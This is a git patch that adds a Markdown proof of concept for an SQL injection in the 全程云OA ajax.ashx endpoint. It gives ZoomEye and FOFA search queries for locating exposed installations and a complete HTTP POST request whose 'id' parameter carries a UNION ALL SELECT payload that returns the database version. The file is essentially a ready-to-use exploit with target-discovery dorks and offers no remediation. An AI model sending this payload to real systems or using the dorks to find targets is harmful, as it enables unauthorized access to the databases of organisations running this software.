From 8ef2f72f20fc960be6d465de7ec196244508967d Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sat, 6 Jan 2024 19:50:19 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E5=85=A8=E7=A8=8B=E4=BA=91OA=5F=5Faja?= =?UTF-8?q?x.ashxSQL=E6=B3=A8=E5=85=A5=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 全程云OA__ajax.ashxSQL注入漏洞.md | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 全程云OA__ajax.ashxSQL注入漏洞.md diff --git a/全程云OA__ajax.ashxSQL注入漏洞.md b/全程云OA__ajax.ashxSQL注入漏洞.md new file mode 100644 index 0000000..9bb2c4a --- /dev/null +++ b/全程云OA__ajax.ashxSQL注入漏洞.md @@ -0,0 +1,26 @@ +## 全程云OA__ajax.ashxSQL注入漏洞 + +## zoomeye +``` +app:"全程云OA" +``` + +## fofa +``` +".passImg{background:url(images/yiyaoshi.png)" +``` + +## poc +``` +POST /OA/common/mod/ajax.ashx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 +Connection: close +Content-Type: application/x-www-form-urlencoded +Accept-Encoding: gzip, deflate + +dll=DispartSell_Core.dll&class=DispartSell_Core.BaseData.DrpDataManager&method=GetProductById&id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+ +``` + + +![image](https://github.com/wy876/POC/assets/139549762/7ce08043-58c9-405b-9714-f7854852abf3)